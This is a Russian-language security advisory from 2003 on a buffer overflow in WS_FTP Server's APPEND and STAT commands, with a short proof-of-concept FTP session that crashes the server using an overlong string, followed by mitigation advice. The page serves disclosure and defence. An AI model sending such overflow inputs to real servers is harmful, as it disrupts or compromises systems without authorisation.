Удаленное выполнение произвольного кода в WS_FTP FTP сервере

Дата публикации:
08.09.2003
Всего просмотров:
898
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:

Уязвимые версии: WS_FTP Server 3.x, 4.х

Описание: Уязвимость обнаружена в WS_FTP Server. Удаленный или локальный пользователь может выполнить произвольный код на уязвимой системе.

Уязвимость связанна с неправильной проверкой границ при обработке пользовательских данных в FTP командах APPEND или STAT. Злонамеренный пользователь может представить специально обработанный параметр длиннее 255 байт, чтобы вызвать переполнение буфера и выполнить произвольный код на целевой системе с привилегиями FTP сервера.

Пример/Эксплоит:

 
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
Connection closed by remote host.
ftp>

URL производителя: http://www.wsftp.com/

Решение:

Разрешайте только доверенным пользователям доступ к FTP серверу. Фильтруйте злонамеренный ввод на FTP прокси. Используйте альтернативное программное обеспечение.

Ссылки: Remote and Local Vulnerabilities In WS_FTP Server
или введите имя

CAPTCHA